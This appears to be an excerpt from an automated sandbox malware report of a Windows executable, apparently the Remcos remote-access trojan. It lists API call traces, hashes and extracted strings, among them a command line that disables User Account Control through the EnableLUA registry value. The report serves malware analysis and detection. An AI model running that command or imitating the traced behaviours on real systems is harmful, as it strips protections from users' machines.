                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                • Opcode Fuzzy Hash: 881ec567a8ecab9b5ae46dea35bb7569396cf57d6f42af84948da6ead9762d9b
                                • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 88b0ec0b9de38ee72874faffadaad7a58cf941c8d18bd5a35ca229f780ffab3e
                                • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                • Opcode Fuzzy Hash: 88b0ec0b9de38ee72874faffadaad7a58cf941c8d18bd5a35ca229f780ffab3e
                                • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404DD2
                                • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                • String ID: PkGNG
                                • API String ID: 3360349984-263838557
                                • Opcode ID: da9b55f167a3d17e97016713e4b8b3caaa4e9716ac3efc00888ec9c07983d3ee
                                • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                • Opcode Fuzzy Hash: da9b55f167a3d17e97016713e4b8b3caaa4e9716ac3efc00888ec9c07983d3ee
                                • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1m70ggeepT.exe,00000104), ref: 00443475
                                • _free.LIBCMT ref: 00443540
                                • _free.LIBCMT ref: 0044354A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\Desktop\1m70ggeepT.exe$`&v
                                • API String ID: 2506810119-3335843684
                                • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSizeSleep
                                • String ID: XQG
                                • API String ID: 1958988193-3606453820
                                • Opcode ID: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                • Opcode Fuzzy Hash: 205b82dffe9b0f77f7c93e78d4092e9a7ef319f9f0d3ec4eb64b3aa0a1bff41f
                                • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                • GetLastError.KERNEL32 ref: 0041D580
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCreateErrorLastRegisterWindow
                                • String ID: 0$MsgWindowClass
                                • API String ID: 2877667751-2410386613
                                • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                • CloseHandle.KERNEL32(?), ref: 004077AA
                                • CloseHandle.KERNEL32(?), ref: 004077AF
                                Strings
                                • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                • SetEvent.KERNEL32(?), ref: 0040512C
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                • CloseHandle.KERNEL32(?), ref: 00405140
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                • String ID: KeepAlive | Disabled
                                • API String ID: 2993684571-305739064
                                • Opcode ID: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                • Opcode Fuzzy Hash: c594fc0502ac089e8ceed4a366586e120d9a374f389bb2b837d8f1f373a196b1
                                • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                • Sleep.KERNEL32(00002710), ref: 0041AE07
                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                • String ID: Alarm triggered
                                • API String ID: 614609389-2816303416
                                • Opcode ID: 2f63ca3754ee2fa8067f4581fa5685451e0165abe6878d0f9dceb9a842065b81
                                • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                • Opcode Fuzzy Hash: 2f63ca3754ee2fa8067f4581fa5685451e0165abe6878d0f9dceb9a842065b81
                                • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                Strings
                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                • API String ID: 3024135584-2418719853
                                • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                • _free.LIBCMT ref: 00444E06
                                • _free.LIBCMT ref: 00444E1D
                                • _free.LIBCMT ref: 00444E3C
                                • _free.LIBCMT ref: 00444E57
                                • _free.LIBCMT ref: 00444E6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$AllocateHeap
                                • String ID:
                                • API String ID: 3033488037-0
                                • Opcode ID: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                • Opcode Fuzzy Hash: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 004493BD
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                  • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 2180151492-0
                                • Opcode ID: af739ac690ee8d07d81366b8be29f9ccbff63967b6472fc478213852870bed76
                                • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                • Opcode Fuzzy Hash: af739ac690ee8d07d81366b8be29f9ccbff63967b6472fc478213852870bed76
                                • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
